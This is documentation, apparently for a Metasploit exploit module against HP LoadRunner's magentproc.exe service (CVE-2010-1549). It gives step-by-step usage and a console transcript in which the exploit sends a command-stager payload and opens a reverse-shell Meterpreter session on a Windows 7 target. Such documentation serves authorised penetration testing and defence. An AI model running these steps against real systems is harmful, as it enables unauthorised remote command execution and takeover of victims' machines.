adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c70043f84286ed1eff7da2fef5dd7f2122b81663
metasploit-gs/documentation/modules/exploit/windows/misc/hp_loadrunner_magentproc_cmdexec.md
T
h00die 557a15a115 spelling fixes on docs
2023-10-10 14:46:18 -04:00

2.5 KiB
Raw Blame History

Vulnerable Application

HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution (CVE-2010-1549)

This module exploits a remote command execution vulnerability in HP LoadRunner before 9.50 and also HP Performance Center before 9.50. By sending a specially crafted packet, an attacker can execute commands remotely. The service is vulnerable provided the Secure Channel feature is disabled (default).

During testing, additional versions were verified to be vulnerable. The following list documents them:

  • HP LoadRunner 12.53 Community Edition (non-default SSL turned off)

HP LoadRunner 9.50 or below, or a version documented above.

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/windows/misc/hp_loadrunner_magentproc_cmdexec
  4. Do: set RHOST [ip]
  5. Do: run
  6. You should get a shell.

Scenarios

Win7 OS with HP LoadRunner 12.53 Community Edition

msf > use exploit/windows/misc/hp_loadrunner_magentproc_cmdexec
msf exploit(hp_loadrunner_magentproc_cmdexec) > set RHOST victim
RHOST => victim
msf exploit(hp_loadrunner_magentproc_cmdexec) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444
[*] victim:54345 - Sending payload...
[*] victim:54345 - Command Stager progress -   1.47% done (1499/102292 bytes)
[*] victim:54345 - Command Stager progress -   2.93% done (2998/102292 bytes)
[*] victim:54345 - Command Stager progress -   4.40% done (4497/102292 bytes)
[*] victim:54345 - Command Stager progress -   5.86% done (5996/102292 bytes)
[*] victim:54345 - Command Stager progress -   7.33% done (7495/102292 bytes)
...snip...
[*] victim:54345 - Command Stager progress -  92.32% done (94437/102292 bytes)
[*] victim:54345 - Command Stager progress -  93.79% done (95936/102292 bytes)
[*] victim:54345 - Command Stager progress -  95.25% done (97435/102292 bytes)
[*] victim:54345 - Command Stager progress -  96.72% done (98934/102292 bytes)
[*] victim:54345 - Command Stager progress -  98.15% done (100400/102292 bytes)
[*] victim:54345 - Command Stager progress -  99.55% done (101827/102292 bytes)
[*] victim:54345 - Command Stager progress - 100.00% done (102292/102292 bytes)
[*] Sending stage (179267 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:55556) at 2017-11-09 03:53:08 +1100

meterpreter > sysinfo
Computer        : TARGET
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_AU
Domain          : DOMAIN
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter >
Background session 1? [y/N]
Reference in New Issue View Git Blame Copy Permalink